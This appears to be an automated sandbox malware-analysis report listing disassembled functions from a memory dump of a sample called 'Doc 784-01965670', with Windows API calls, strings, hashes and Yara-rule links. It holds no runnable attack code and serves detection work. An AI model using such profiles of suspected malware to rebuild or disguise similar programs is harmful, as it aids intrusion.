                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                                                                                    • API String ID: 3590180749-2894483878
                                                                                                                                    • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                                    • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                                                                                    • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                                    • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                                                                                    Function 0046F90E Relevance: 21.1, APIs: 14, Instructions: 147windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                                                                                    • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0046F950
                                                                                                                                    • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                                                                                    • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                                                                                    • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                                                                                    • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                                                                                    • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0046FA68
                                                                                                                                    • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3412594756-0
                                                                                                                                    • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                                    • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                                                                                    • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                                    • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                                                                                    Function 0045D971 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 140COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                                      • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                    • API String ID: 4013263488-4113822522
                                                                                                                                    • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                                    • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                                                                                    • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                                    • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                                                                                    Function 00435A35 Relevance: 21.1, APIs: 14, Instructions: 136timeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 228034949-0
                                                                                                                                    • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                                                    • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                                                                                    • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                                                    • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                                                                                    Function 004334CA Relevance: 21.1, APIs: 14, Instructions: 132filecommemoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                                                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                                                                                    • DeleteObject.GDI32(?), ref: 00433603
                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3969911579-0
                                                                                                                                    • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                                    • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                                                                                    • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                                    • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                                                                                    Function 00445A77 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 73windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetParent.USER32 ref: 00445A8D
                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                                                                                    • __wcsicoll.LIBCMT ref: 00445AC4
                                                                                                                                    • __wcsicoll.LIBCMT ref: 00445AE0
                                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                    • API String ID: 3125838495-3381328864
                                                                                                                                    • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                                    • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                                                                                    • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                                    • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                                                                                    Function 00479921 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 314COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CopyVariant$ErrorLast
                                                                                                                                    • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                                                                                    • API String ID: 2286883814-4206948668
                                                                                                                                    • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                                    • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                                                                                    • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                                    • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                                                                                    Function 00475D8B Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 194COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                                      • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                    • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                                                                                    • _wcscpy.LIBCMT ref: 00475F18
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                                    • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                                                                                    • API String ID: 3052893215-4176887700
                                                                                                                                    • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                                    • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                                                                                    • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                                    • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                                                                                    Function 004582BF Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 165registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                    • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                                                                                    • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                                                                                    • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                                                                                    • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                                                                                    • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                                                                      • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                                                                                    • String ID: Version$\TypeLib$interface\
                                                                                                                                    • API String ID: 656856066-939221531
                                                                                                                                    • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                                    • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                                                                                    • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                                    • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                                                                                    Function 0045E62E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 155COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                                                                                    • __swprintf.LIBCMT ref: 0045E6EE
                                                                                                                                    • _printf.LIBCMT ref: 0045E7A9
                                                                                                                                    • _printf.LIBCMT ref: 0045E7D2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                    • API String ID: 3590180749-2354261254
                                                                                                                                    • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                                    • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                                                                                    • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                                    • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                                                                                    Function 00452E2A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 154COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                                    • API String ID: 3038501623-2263619337
                                                                                                                                    • Opcode ID: 7e05bcd9e2404d5900448c0fd088cae6e51159eb800a8f0db5a010da26838fc3
                                                                                                                                    • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                                                                                                                                    • Opcode Fuzzy Hash: 7e05bcd9e2404d5900448c0fd088cae6e51159eb800a8f0db5a010da26838fc3
                                                                                                                                    • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                                                                                                    Function 004580E1 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 136registryshareCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                    • _memset.LIBCMT ref: 00458194
                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                                                                    • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                    • API String ID: 2255324689-22481851
                                                                                                                                    • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                                    • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                                                                    • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                                    • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                                                                                    Function 004584D6 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 105registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                                                                                    • __wcsicoll.LIBCMT ref: 004585D6
                                                                                                                                    • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
